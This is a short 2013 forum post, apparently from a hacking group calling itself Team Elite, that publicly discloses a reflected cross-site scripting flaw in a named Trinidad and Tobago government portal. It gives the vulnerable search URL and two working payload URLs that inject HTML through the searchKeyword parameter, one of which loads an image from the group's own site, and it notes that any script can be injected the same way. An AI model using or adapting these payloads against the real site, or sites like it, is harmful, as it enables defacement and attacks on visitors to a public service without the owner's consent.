This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Gå till toppen
18.97.9.171.US.SSL

Government of Trinidad and Tobago - XSS

Vulnerable page: http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch

PoC:

Kod
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><h1>XSS found by Team Elite</h1>

Kod
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searchKeyword parameter.

Screenshot#1
[Screenshot#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av Neo den 2013-12-04 19:45 0 likes

Kommentarer

There are no comments for this news article, you can leave one here.